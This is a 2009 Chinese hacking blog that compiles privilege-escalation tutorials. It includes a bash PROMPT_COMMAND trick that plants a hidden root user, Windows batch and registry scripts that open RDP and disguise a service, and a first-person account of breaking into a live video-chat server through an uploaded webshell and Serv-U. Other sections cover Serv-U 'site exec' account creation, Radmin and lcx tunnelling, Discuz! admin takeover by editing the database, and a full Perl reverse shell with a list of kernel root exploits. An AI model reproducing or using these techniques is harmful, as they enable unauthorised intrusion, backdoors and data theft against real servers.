大西瓜的杂货铺 » 提权

利用BASH提权的技巧

Daxigua — Tue, 29 Dec 2009 14:27:40 +0000

作者：xi4oyu

要利用成功的话，还得看管理员的习惯，是否喜欢用su切换成root

看个BASH的环境变量

$PROMPT_COMMAND

这个变量保存了在主提示符$PS1显示之前需要执行的命令.

export PROMPT_COMMAND=”/usr/sbin/useradd -o -u 0 kkoo &>/dev/null && echo kkoo:123456 | /usr/sbin/chpasswd &>/dev/null && unset PROMPT_COMMAND”

看图：

随后你用su变成root，看看是否多了个用户呢

也可以建立用户删除不了的文件
比如，用户想删除某个，你在prompt_command里面加入cp命令，每次他执行完del都会又cp一个过去

具体怎么应用看你自己了

服务器提权大法笔记

Daxigua — Sat, 26 Dec 2009 16:12:44 +0000

From:http://hi.baidu.com/ymhacker/blog/item/fce947e997c50034b90e2dad.html

flashfxp提权
重点将对方的.dat文件全部弄下来。。。然后揽权

具体是这三个文件

quick.dat

Sites.dat

Stats.dat

然后就是快速连接，，接着用passlook来查看对方的密码。。

=====================================================================================================================
serv-u没有权限查看的情况下

asp直接揽权

上传一个aspx的木马，，然后提权。。前提是默认密码没有改动，并且服务器直持aspx的解析

asp可以直接提权的情况下。可以执行很多种方法的
如果可以将对方的serv-uadmin给下载下来。。然后查看对方的密码。。再在提权也是不错的
winhex改的是serv-admin
利用winhex查看localadministrators

首先是改了密码没改账户的情况。我们可以直接用UE打开ServUAdmin.exe，搜索账户“LocalAdministrator”
紧着着账户后面的字符串就是密码。

一般是这样的格式：LocalAdministrator.password.Globl……，其中Password就是我们需要的密码了。
======

工具读取的是serv-demon.exe的密码
=========================================================================================

webshell开启3389

对于serv-u 6.3直接揽权是不能够成功的..要用aspx版的…

当然只要这种serv-u可以直接在线提权的..那么.我们可以直接用serv-u来进行提权

3389.bat 来开启对方的3389

内容如下

echo Windows Registry Editor Version 5.00>>C:\RECYCLER\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>C:\RECYCLER\3389.reg
echo “fDenyTSConnections”=dword:00000000>>C:\RECYCLER\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>C:\RECYCLER\3389.reg
echo “PortNumber”=dword:00000d3d>>C:\RECYCLER\3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>C:\RECYCLER\3389.reg
echo “PortNumber”=dword:00000d3d>>C:\RECYCLER\3389.reg
regedit /s C:\RECYCLER\3389.reg

===============================================================================================

教你如何开3389端口的多种方法!

首先我们制作开启3389的工具

先把下面的注册表内容copy一份，另存为3389.reg注册表文件

注册表内容：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]

“Enabled”=”0″

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

“ShutdownWithoutLogon”=”0″

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]

“EnableAdminTSRemote”=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]

“TSEnabled”=dword:00000001

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]

“Start”=dword:00000002

[HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]

“Hotkey”=”1″

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]

“Start”=dword:00000002

“ErrorControl”=dword:00000001

“ImagePath”=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\

74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\

00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00

“ObjectName”=”LocalSystem”

“Type”=dword:00000010

“Description”=”Microsoft”

“DisplayName”=”Microsoft”

再把下面的内容保存为批处理文件3389.bat

安装批处理内容：

copy termsrv.exe eventlog.exe

regedit.exe /s 3389.reg

del 3389.reg

del 3389.exe

del 3389.bat

用winrar制作成exe自解压缩包

=======================================================================================
从上传webshell到突破TCP/IP筛选到3389终端登陆
作者：未知文章来源：本站整理点击数： 30 更新时间：2007-1-7 19:31:39
一：得到webshell
今天晚上的一次小小测试，由于本人太菜，再高深的技术我也不会，只能这样了……….
一切都已经过去了，没有办法补图了，希望能看的懂这个小帖子。
今天有是无聊的一天，晚上实在无聊没有事情干，就到一个视频聊天站点看秀，嘿嘿~
突然发现一个聊天室特别的火暴，人数已经有500人在里面了（满员了），刷了n次也没有进去……….更加郁闷了！：（
想想反正也是没有事情做，测试一下主机安全做的怎么样吧，呵呵（太菜，说测试人家安全实在是抬高自己了）
在cmd下ping了一下得到了对方的ip，然后登陆http://whois.webhosting.info/对方ip看看有没有其他的站点，哈，这下发了，上面有几十个

站点，估计我还是能找到一个两个带漏洞的站点的`
经过漫长的查找，终于找到一个动易带漏洞的页面http://www.xxxx.net/Upfile_Soft.asp，上传一个webshell（海阳2005正式版）先（怎么上

传我就不罗嗦了，上传工具现在漫天飘了）。

二：成功提升权限建立用户
拿到webshell后高高兴兴的登陆了，突然发现什么权限都没有，只能在自己的webshell所在的目录里面打转（c.d.e.f盘都浏览不了），连删除

文件的权限都没有，郁闷呀……..
回到〖Server〗下看看主机开了什么服务吧，经过发现他开了终端服务和serv-u服务，哈，这下有搞头了^_^用superscan扫描了一下他的ip，

果然通过banner看出他是用的serv-u，版本5.0。
到〖Wscript.Shell〗下面试试看能执行cmd命令不能，输入net user后没有反映，再试通过Wscript.Shell能执行cmd命令不能，再次输入net

user后执行返回了对方的user名单，哈哈，这下好了，能拿下了！！
上传serv-u提升工具到D:\a004\tggtwe\****.com\UploadSoft目录下面，改名为：test.exe，然后回到〖Wscript.Shell〗下执行命令去了，嘿

嘿，马上一只肥鸡就要到手了，高兴ing~
通过Wscript.Shell执行cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe “net user guest /active:yes” #激活guest账号，我喜欢用这个账号
D:\a004\tggtwe\****.com\UploadSoft\test.exe “net user guest lvhuana” #把guest账号的密码设定为lvhuana
D:\a004\tggtwe\****.com\UploadSoft\test.exe “net localgroup administrators guest /add” #提升guest权限到admin权限
好了，账号建立完毕，执行一下net localgroup administrators看看成功没，通过回显知道添加成功了。然后执行netstat -an后看到他开的

终端端口是默认的3389，OK，连接试试~

三：解决TCP/IP筛选
连接不上！？晕………..再拿出superscan来扫一下他的3389，根本扫不到……..（开了防火墙！？靠，我的点真背…..）
没有办法了，再次回到Wscript.Shell执行cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe c: /e /t /g everyone:F” #把c盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe d: /e /t /g everyone:F” #把d盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe e: /e /t /g everyone:F” #把e盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe f: /e /t /g everyone:F” #把f盘设置为everyone可以浏览
这下最少可以遍历整个硬盘了，我在硬盘里面到处的翻，找遍了也没有找到他的防火墙文件，这下心里有数了，肯定是他进行TCP/IP筛选了！

（当然也有是内网做服务器的可能，具体大家自己可以根据ipconfig -all来判断）
突破TCP/IP筛选我们可以更改他的注册表来实现，我们要做的就是导出他注册表的三处，更改后再导入就可以了，回到〖Wscript.Shell〗执行

cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -e D:\a004\tggtwe\****.com\UploadSoft\1.reg

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip” #导出注册表里关于TCP/IP筛选的第一处
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -e D:\a004\tggtwe\****.com\UploadSoft\2.reg

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip” #导出注册表里关于TCP/IP筛选的第二处
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -e D:\a004\tggtwe\****.com\UploadSoft\3.reg

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip” #导出注册表里关于TCP/IP筛选的第三处
然后回到〖Stream〗或〖FSO〗发现1.reg,2.reg,3.reg已经安静的躺在那里了，嘿嘿~
把1.reg,2.reg,3.reg下载回来到自己的硬盘里面编辑一下，把关于TCP/IP筛选的几个地方改一下，首先打开1.reg找

到”EnableSecurityFilters”=dword:00000001把最后面的数字1改成0后保存，然后更改2.reg,3.reg，更改方法一样，我就不再罗嗦了~
然后我们把1.reg,2.reg,3.reg再上传回对方的机器里面（这里我们要选上覆盖模式，因为没有权限删除原来的1.reg,2.reg,3.reg），上传成

功后再回到〖Wscript.Shell〗执行cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -s D:\a004\tggtwe\****.com\UploadSoft\1.reg” #安静模式下把我们修改完的

1.reg导入到他的注册表
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -s D:\a004\tggtwe\****.com\UploadSoft\2.reg” #安静模式下把我们修改完的

2.reg导入到他的注册表
D:\a004\tggtwe\****.com\UploadSoft\test.exe “regedit -s D:\a004\tggtwe\****.com\UploadSoft\3.reg” #安静模式下把我们修改完的

3.reg导入到他的注册表
OK！导入后重新启动他的机器后在能解决TCP/IP筛选问题，再在〖Wscript.Shell〗执行cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe “iisreset /reboot /timeout:00″ #利用他自身的iis服务来重新启动他的机

器，/timeout:00这个参数是让他立即重新启动
执行完后我们再用superscan已经扫不到他了，吼吼~已经重新启动了！

四：成功用终端登陆
经过漫长的等待后（其实时间不长，只是我在这里已经等不及了，嘿嘿~），终于可以用superscan扫到他了，并且可以扫到他的3389端口了，

哈哈，终于成功了，拿出终端登陆器顺利的用我刚才建立的user：guest，pass：lvhuana登陆上了！
好了，这篇垃圾文章到此就该结束了，已经凌晨了，也该收工睡觉了~由于本人太菜，错误地方肯定在所难免，让大家见笑了，同时望大家指正

！
==================================================================================================
服务器配置的过程中是要重起的…tcp/ip筛选的配置
去掉tcp/ip筛选限制的思路
TCP/IP筛选在注册表里有三处，分别是：
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分别用
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
命令来导出注册表项

然后把三个文件里的EnableSecurityFilters”=dWord:00000001，改成EnableSecurityFilters”=dword:00000000

再将以上三个文件分别用
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
导入注册表即可

===================================================================================

服务器去除浏览限制
三：解决TCP/IP筛选
连接不上！？晕………..再拿出superscan来扫一下他的3389，根本扫不到……..（开了防火墙！？靠，我的点真背…..）
没有办法了，再次回到Wscript.Shell执行cmd命令：
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe c: /e /t /g everyone:F” #把c盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe d: /e /t /g everyone:F” #把d盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe e: /e /t /g everyone:F” #把e盘设置为everyone可以浏览
D:\a004\tggtwe\****.com\UploadSoft\test.exe “cacls.exe f: /e /t /g everyone:F” #把f盘设置为everyone可以浏览

===================================================================================
4899提权大法

这种的只能用serv-u.exe或者用1.aspx来进行提权，而不能直接在那个框框提交,不然是不会成功的

c:\ftp.exe “c:\aaa.reg”
c:\ftp.exe “c:\admdll.dll”
c:\ftp.exe “c:\raddrv.dll”
c:\ftp.exe “c:\r_server.exe”
C:\RECYCLER\aaa.reg
C:\RECYCLER\admdll.dll
C:\RECYCLER\raddrv.dll
C:\RECYCLER\r_server.exe
r_server.exe /port:4899 /pass:123456 /save /silence
=================================================================================
serv-u有修改权限提权

d:\Program Files\Serv-U\ServUDaemon.ini
Domain1=0.0.0.0||21|ttttttt|1|0|0

以下的不用
[DOMAINS]
Domain1=192.168.3.128||21|100|2|0|0

c:\winnt\system32\inetsrv\data\

quote site exec net user tianya$ 1314520 /add

quote site exec net localgroup administrators tianya$ /add

6.3
[GLOBAL]
Version=6.3.0.0
PacketTimeOut=300
UseUPnP=0
ProcessID=4016
[Domain1]
User1=tianya520|1|0
[USER=tianya520|1]
Password=bi03295E0289695A0EC4BF4D8878F30BC7
HomeDir=c:\
TimeOut=600
Maintenance=System
Note1=”Wizard generated account”
Access1=C:\|RWAMELCDP[DOMAINS]
Domain1=192.168.3.128||21|100|2|0|0
将domain2以下替换也可以1314520
[Domain2]
User1=tianya520|1|0

User2=wokao|1|0
[USER=tianya520|2]
Password=mh145ECC36D9B3A24553FBEA44539BF53C
HomeDir=c:\
PasswordLastChange=1183270824
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
[USER=wokao|2]
Password=evF73373D1DD342F450526DF7AF5AF0356
HomeDir=c:\
PasswordLastChange=1183271173
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
=================================
[Domain2]
User1=test100|1|0
[USER=test100|2]
Password=qe5827CFDF302C0BCE780CE9C28AED63C5
HomeDir=c:\
PasswordLastChange=1183271629
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
501 Cannot EXEC command line (error=2).
对方将cmd.exe 及 net user 移走
net.exe
net1.exe
quote site exec net1 user ffffff 1314520 /add
=================================================================================
lcx+radmin内网提权
首先在本地监听端口

lcx －listen 9200 9800
好了
在肉鸡上运行radmin，这里我已经运行了，下面用lcx端口映射

本机ip：60.176.26.20

60.176.26.20
的确是本机的ip，这就是ip映射的神奇
肉鸡ip：192.168.1.2
执行 lcx －slave 60.176.26.20 9200 192.168.1.2 4899
呵呵有反映了吧，好我们用radmin连接本机的9800，
看到了把，不是本机的画面哦，

3389
本地 lcx -listen 51 3800
对方 lcx -slave 121.34.63.48 51 对方内网ip 3389
d:\RECYCLER\su.exe “lcx -slave 121.34.63.48 51 192.168.17.252 3389″

提权技术研究_Discuz!管理员复制

daxigua — Tue, 22 Dec 2009 01:31:10 +0000

注：原文中也没看到图片，不知道是怎么回事。

作者：simeon，原文地址：

http://www.antian365.com/viewthread.php?tid=5297&extra=page%3D1

Crossday Discuz! Board 论坛系统（简称 Discuz! 论坛）是一个采用 PHP 和 MySQL 等其它多种数据库构建的高效论坛解决方案。作为商业软件产品， Discuz! 在代码质量，运行效率，负载能力，安全等级，功能可操控性和权限严密性等方面有着良好的口碑。对于站长而言，利用 Discuz! 均能够在最短的时间内，花费最低的费用，采用最少的人力，架设一个性能优异、功能全面、安全稳定的社区论坛平台。它能运行于Windows平台和Linux平台，目前已经有超过100万的用户。

使用Discuz!来建设论坛方便快捷，能够满足论坛功能需求，其安全性与同类相比是相对最高的，因此深受广大用户的喜爱，而在网络攻防技术研究中最为核心的东西就是获取用户数据以及获得系统的完全控制权限，本文主要针对Discuz!数据库如何获取管理员权限而展开研究的。在某些情况下，是完全可以获取一个Webshell，在获取Webshell的情况下，可以进一步获取Mysql等有关数据库连接的用户和密码等信息，由于Discuz!特有的加密方式，即使通过SQL注入猜解获取了Discuz!论坛管理员的密码也无法破解，因此如何通过操作数据库来获得管理员权限就尤为有用。本文研究的技术可以应用在两个方面：

（1）恢复论坛管理员的密码。对于Discuz!论坛管理员来说，如果忘记密码了，那么对于整个论坛的管理将无从下手，因此只能想办法恢复。

（2）提升权限获取用户数据库文件。在得到Webshell的情况下，通过本文研究的技术可以轻易的查看管理员信息，修改论坛设置、备份数据库等操作，还可以让普通用户具有管理员权限。

实验环境：

（1）数据库——Mysql5.1

（2）Mysql数据库客户端管理软件——Mysql-Front

（3）Discuz!论坛版本7.0，下载地址：http://download.comsenz.com/Discuz

（一）Discuz!论坛加密方式

Discuz!6.X以及后面的7.0版本都采用md5多重加密，其加密函数有checkmd5和authcode，该函数在Discuz!缺省安装include目录下的global.func.Php文件中。先采用salt方式，随机获得一个字符串，然后把明文密码MD5之后，再与随机字符串连接起来之后，再次MD5。加密密码为：md5(md5($newpw).$salt) 其中$salt为random，返回的字符串$hash。这样就极大的提高了用户密码的安全性。

1.checkmd5函数

function checkmd5($md5, $verified, $salt = ”) {

if(md5($md5.$salt) == $verified) {

$result = !empty($salt) ? 1 : 2;

} elseif(empty($salt)) {

$result = $md5 == $verified ? 3 : ((strlen($verified) == 16 && substr($md5, 8, 16) == $verified) ? 4 : 0);

} else {

$result = 0;

}

return $result;

}

以上代码主要度对密码进行检测，有三个参数：

@param string $md5

@param string $verified

@param string $salt

返回值为“0”表示失败；为“1”采用“MD5 with salt”；为“2”采用“Dual MD5”；为“3”表示是采用正常md5加密方式，为“4”采用“MD5-16”方式。

2.authcode函数

function authcode($string, $operation = ‘DECODE’, $key = ”, $expiry = 0) {

$ckey_length = 4;

$key = md5($key ? $key : $GLOBALS['discuz_auth_key']);

$keya = md5(substr($key, 0, 16));

$keyb = md5(substr($key, 16, 16));

$keyc = $ckey_length ? ($operation == ‘DECODE’ ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : ”;

$cryptkey = $keya.md5($keya.$keyc);

$key_length = strlen($cryptkey);

$string = $operation == ‘DECODE’ ? base64_decode(substr($string, $ckey_length)) : sprintf(‘%010d’, $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;

$string_length = strlen($string);

$result = ”;

$box = range(0, 255);

$rndkey = array();

for($i = 0; $i <= 255; $i++) {

$rndkey[$i] = ord($cryptkey[$i % $key_length]);

}

for($j = $i = 0; $i < 256; $i++) {

$j = ($j + $box[$i] + $rndkey[$i]) % 256;

$tmp = $box[$i];

$box[$i] = $box[$j];

$box[$j] = $tmp;

}

for($a = $j = $i = 0; $i < $string_length; $i++) {

$a = ($a + 1) % 256;

$j = ($j + $box[$a]) % 256;

$tmp = $box[$a];

$box[$a] = $box[$j];

$box[$j] = $tmp;

$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));

}

if($operation == ‘DECODE’) {

if((substr($result, 0, 10) == 0 || substr($result, 0, 10) – time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {

return substr($result, 26);

} else {

return ”;

}

} else {

return $keyc.str_replace(‘=’, ”, base64_encode($result));

}

以上代码主要用来加密或者解密用户信息，其中参数意义如下：

@param $string – 加密或解密的串

@param $operation – 加密还是解密

@param 密钥

@return 返回字符串

$ckey_length 随机密钥长度取值 0-32;加入随机密钥，可以令密文无任何规律，即便是原文和密钥完全相同，加密结果也会每次不同，增大破解难度。取值越大，密文变动规律越大，密文变化 = 16 的 $ckey_length 次方，当此值为 0 时，则不产生随机密钥

（二）使用Mysql-Front管理Mysql数据库

1.设置MySQL-Front

MySQL-Front是一款MySQL客户端管理软件，可以对MySQL数据库实现图形界面管理，软件下载地址：http://www.mysqlfront.de/download.html。安装MySQL-Front完毕后，直接运行MySQL-Front即可，如图1所示，其中“信息”标签主要用于现实名称，可以随意设置，主要在“注册”标签中进行设置，需要手工输入“用户”和“密码”，“数据库”可以手工输入，也可以程序自动获取，设置完毕后单击“确定”按钮保存数据库设置并回到MySQL“打开登录信息”窗口。

图1 设置MySQL-Front

说明：

（1）管理MySQL数据库有多个软件，也可以通过phpmyadmin进行在线管理，其下载地址为：http://www.phpmyadmin.net。

（2）本例中使用客户端软件来管理MySQL数据库是因为方便快捷，当然熟悉MySQL命令的朋友也可以手工在命令提示符下执行数据库操作。

2.连接MySQL数据库

在“打开登录信息”窗口中选择刚才设置的MySQL数据，然后打开即可，如图2所示，在MySQL-Front中常用的四个按钮为“对象浏览器”、“数据浏览器”、“SQL编辑器”和“图表”。“对象浏览器”主要用来浏览有哪些表，而“数据浏览器”主要用来查看选中数据库的表中的数据，“SQL编辑器”主要用来执行SQL语句，“图表”主要用来与“对象浏览器”进行切换，更多好用的功能和技巧需要自己去揣摩，就不再此赘述了。

图2 打开MySQL数据库

（三）实施管理员复制

1.注册网站用户

在实施管理员复制前，需要先在网站注册一个用户名，例如在本例中注册普通用户“cxb”，密码为“test”，注册成功使用该用户进行登录，如图3所示。

图3 使用注册账号登录注册网站

2.通过MySQL-Front查看已注册用户信息

在MySQL-Front中查看已经注册的用户信息，选中Discuz!论坛的用户注册表“*_members”，其中“*”为安装设置的名称，如图4所示，在本例中为“antian_members”，该表保存的是用户注册的信息，使用“数据浏览器”打开，可以看到该用户注册的一些详细信息。

图4 查看选定用户的注册详细信息

4.修改普通用户为管理员用户

在“antian_members”表中将用户“cxb”的“adminid”值由“0”修改为“1”；将“groupid” 值由“12”修改为“1”，然后单击“MySQL－Front”上面的发布按钮使修改生效，至此已经将普通用户cxb变成管理员用户，在登录的网页中刷新一下，再次查看用户个人信息，如图5所示，用户“cxb”的用户组已经升级为“Administrator”，可以行使管理员权限。

图5 普通用户组已经升级为管理员组

（四）管理员密码丢失解决方案

1.修改管理员密码为已知用户密码

使用Mysql-Front打开myuc_members表后，单击工具条下面的“数据浏览器”

查看myuc_members表中的数据，如图6所示，先将admin的password值复制到本地进行备份，以待出现错误后进行恢复，将已知用户的密码值（password中的值）复制到admin中替代原来的值。

图6修改管理员密码为已知用户密码

2.修改salt

在Discuz!论坛中用户的密码不是普通的加密，而是经过变异的加密，因此还需要保证管理员的密码与已知用户的salt一致，如图7所示，将管理员与已经用户的salt修改成一致。

图7 修改salt

3.修改安全问题答案

在Discuz!论坛中的登录模块中单独设置了安全提问，如图8所示，一共有七个安全提问，用户在注册成功后在个人中心的“密码和安全问题”中进行设置，每一个安全提问根据答案生成一串8位的加密字符，密码不同安全字符串也不同。因此如果想要管理员用户使用普通用户的安全提问，则需要将管理员的“secques”设置成普通用户的“secques”，反之，则将普通用户的“secques”设置成管理员的“secques”，如图9所示，将已知用户的“secques”替换管理员的“secques”，然后使用普通用户的安全提问替代管理员的安全提问进行登录。

图8 安全提问

图9 修改安全提问secques值

至此有关discuz！论坛管理员与普通用户身份之间的转换已经完成，使用修改后的密码和问题答案即可登录，登录后身份为管理员用户，如图10所示，可以对论坛系统进行管理。

图10 登录后台进行管理

（五）总结与探讨

1.总结

本文探讨了discuz！论坛的加密方法，通过实际的案例讲解了如何通过操作MySQL数据库来更改用户身份，即通过修改普通用户的adminid，groupid和secques以及password的值，可以使“普通用户”变成“管理员”行使管理员权限；同时该方法也适用管理员丢失或者忘记了管理密码，通过该方法可以重新设置密码，并行使管理权限。

2.问题与探讨

本文写完后，又发现该管理员的密码可以直接适用PasswordPro工具软件进行破解，由于篇幅关系就不在本文中进行探讨，关于该论坛的安全问题还有很多话题，例如通过脚本来嗅探或者记录用户登录用户名和密码。在discuz！论坛数据库中用户密码字段生成的是密文，网上有一些脚本可以直接用来记录用户登录的密码。

How to root a box

daxigua — Fri, 11 Dec 2009 04:50:21 +0000

注：内容比较全，也用到了那个知名的bc.pl文件

#Trace: Linux 提权教程。
参考视频：

[1]http://rapidshare.com/files/109733291/Linux_Rooting.rar.html

[2]http://files.ge/file/401011/vidzeo-tar-gz.html

Today, I have decided to put up a tutorial for both newbies and pwners! and just reference for all of us. This is a dream of every h4k3r, to get free root access. if you haven’t got one, then try harder, because you are not a h4ck3r then.

Hacking is not about dumping database using prescripted materials by another hacker, a good hacker does write his own script and use it to the maximum extent to achieve whatever his/her project was, and this is refers to as priv8 script.

You have to get access to restricted access before you can say, I’m a h4xor or so!
Today, I will give you brief tutorial on how to get your first root access!

Ok enough.

requirement:
shell http://unsecure-site.com/r57.php

http://unsecured-site.com/c99.php

This mean you have downloaded shell on the site.

You will need, swiss-army weapon (Don’t travel to swiss yet, this is netcat) and it can be downloaded on internet free of charge

you will also need a backconnect script. I provided one for your use here!

so let’s roll on.

Shell Access on a website is the first thing you will need.

You can get this access, by doing uploading of shell to any vulnerable website using the following method:
LFI = Local File Inclusion
RFI = Remote File Inclusion
SQL Injection

I will not go to details on the above. I will post extensive tutorial on those later, but I think the forum must have some nice tuto on those, do some search.

NOW, get swiss knife weapon, AKA netcat

http://www.vulnwatch.org/netcat/nc111nt.zip

If you have an antivirus that auto deletes infected files or virus i would suggest
disabling it as some av’s will detect netcat as a hacktool or remote admin tool.
it is not a virus.

Downloaded? good on window box, double click it and it will bring up a command prompt, then type

-vv -l -n -p

Now backconnet
I preffer to use one thats not
in the shell because i find that those back connects work shitty so i will provide you
with one that i use. Very simple to use just save as “bc.pl” then upload to server and
end execute.

Code:
perl bc.pl
Code: PERL

#!/usr/bin/perl
use IO::Socket;
# Priv8 ** Priv8 ** Priv8
# s4t3ll1t3 SABOTAGE Connect Back Shell
# code by:s4t3ll1t3
# We Are :s4t3ll1t3-C0d3r-NT-\x90
# Email:s4t3ll1t3@ihsteam.com
#
#s4t3ll1t3@SlackwareLinux:/home/programing$ perl dc.pl
#–== ConnectBack Backdoor Shell vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==–
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#s4t3ll1t3@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#–== ConnectBack Backdoor Shell vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==–
#
#[*] Resolving HostName
#[*] Connecting… 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 …
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#–== ConnectBack Backdoor vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==–
#
#–==Systeminfo==–
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown
GNU/Linux
#
#–==Userinfo==–
#uid=1001(lamer) gid=100(users) groups=100(users)
#
#–==Directory==–
#/root
#
#–==Shell==–
#
$system = ‘/bin/bash’;
$ARGC=@ARGV;
print “IHS BACK-CONNECT BACKDOOR\n\n”;
if ($ARGC!=2) {
print “Usage: $0 [Host] [Port] \n\n”;
die “Ex: $0 127.0.0.1 2121 \n”;
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname(‘tcp’)) or die print “[-] Unable to
Resolve Host\n”;
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print “[-] Unable to
Connect Host\n”;
print “[*] Resolving HostName\n”;
print “[*] Connecting… $ARGV[0] \n”;
print “[*] Spawning Shell \n”;
print “[*] Connected to remote host \n”;
SOCKET->autoflush();
open(STDIN, “>&SOCKET”);
open(STDOUT,”>&SOCKET”);
open(STDERR,”>&SOCKET”);
print “IHS BACK-CONNECT BACKDOOR \n\n”;
system(“unset HISTFILE; unset SAVEHIST;echo –==Systeminfo==–; uname -a;echo;
echo –==Userinfo==–; id;echo;echo –==Directory==–; pwd;echo; echo –==Shell==– “);
system($system);
#EOF

copy the above to a file and name it bc.pl upload it to server, you are done.

**Note that if you are running a router or wireless on multiple ips set by your dhcp you
might have to forward the to what ever the ip of your computer is. You
can check this by opening command prompt and typing ipconfig you should get an ip that
looks similar to 192.168.1.100 which is the ip to forward to. If you are unsure about
how to forward your port check out this site and find your router model.

http://portforward.com/routers.htm

Now back to netcat, type the following command.

-vv -l -n -p 443

for this tutorial we will connect on port 4343. Hit enter and it
should start listening for a connection.

remember you had downloaded bc.pl. on the server, now conncet it to you netcat with the following command
perl bc.pl 443

Check your netcat, it should be connected
giving you details info about the box.

i like to do this first to know the kinda exploit u will use.
uname -a;id
Once executed you will see something probably similar to

Code:
Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686
GNU/Linux
uid=33(www-data) gid=33(www-data) groups=33(www-data)

The important information here that you want is the OS & Kernel version which is 2.6.8-2 and you can see the last update of it was in 2005 so it’s fairly old. which is a good thing for us.

below here are kernel that can be rooted, just general ideal. i have a link to the kernels and their exploit, check it out

http://www.molotovbitch.org/localroot/

Code:
2.2 -> ptrace
2.4.17 -> newlocal, kmod, uselib24
2.4.18 -> brk, brk2, newlocal, kmod
2.4.19 -> brk, brk2, newlocal, kmod
2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2
2.4.21 -> brk, brk2, ptrace, ptrace-kmod
2.4.22 -> brk, brk2, ptrace, ptrace-kmod
2.4.22-10 -> loginx
2.4.23 -> mremap_pte
2.4.24 -> mremap_pte, uselib24
2.4.25-1 -> uselib24
2.4.27 -> uselib24
2.6.2 -> mremap_pte, krad, h00lyshit
2.6.5 -> krad, krad2, h00lyshit
2.6.6 -> krad, krad2, h00lyshit
2.6.7 -> krad, krad2, h00lyshit
2.6.8 -> krad, krad2, h00lyshit
2.6.8-5 -> krad2, h00lyshit
2.6.9 -> krad, krad2, h00lyshit
2.6.9-34 -> r00t, h00lyshit
2.6.10 -> krad, krad2, h00lyshit
2.6.13 -> raptor, raptor2, h0llyshit, prctl
2.6.14 -> raptor, raptor2, h0llyshit, prctl
2.6.15 -> raptor, raptor2, h0llyshit, prctl
2.6.16 -> raptor, raptor2, h0llyshit, prctl
2.6.23 – 2.6.24 -> diane_lane_******_hard.c
